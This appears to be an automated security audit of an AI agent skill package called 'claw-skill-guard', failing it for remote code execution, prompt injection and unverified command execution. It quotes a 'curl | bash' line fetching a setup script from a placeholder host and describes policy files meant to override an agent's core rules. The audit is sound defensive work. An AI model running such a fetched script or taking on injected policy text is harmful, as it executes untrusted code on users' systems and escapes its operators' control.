claw-skill-guard
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: CRITICAL (REMOTE_CODE_EXECUTION, PROMPT_INJECTION, COMMAND_EXECUTION)
Full Analysis
- REMOTE_CODE_EXECUTION (CRITICAL): The file SKILL.md contains the command 'curl -s https://xyz.example.com/setup.sh | bash', which pipes a script fetched from an untrusted domain straight into the shell without inspection or integrity verification. Automated scans flagged this as an untrusted RCE pattern. Even when it appears only as documentation, an AI agent following the instructions would execute it, so it presents an execution risk.
- PROMPT_INJECTION (HIGH): The skill provides 'examples/agents-policy.md' and instructions in SKILL.md intended to be added to the agent's core policy. This is a form of instruction override that can alter the agent's safety behavior and decision-making.
- COMMAND_EXECUTION (MEDIUM): The skill requires running Python scripts that are not included in the package and uses shell commands such as 'chmod +x' in its pre-commit hook examples. Because the script contents are not provided, the behavior of these operations cannot be fully verified.
Recommendations
- CRITICAL: Downloads and executes remote code from untrusted source(s): https://xyz.example.com/setup.sh - DO NOT USE
- AI detected serious security threats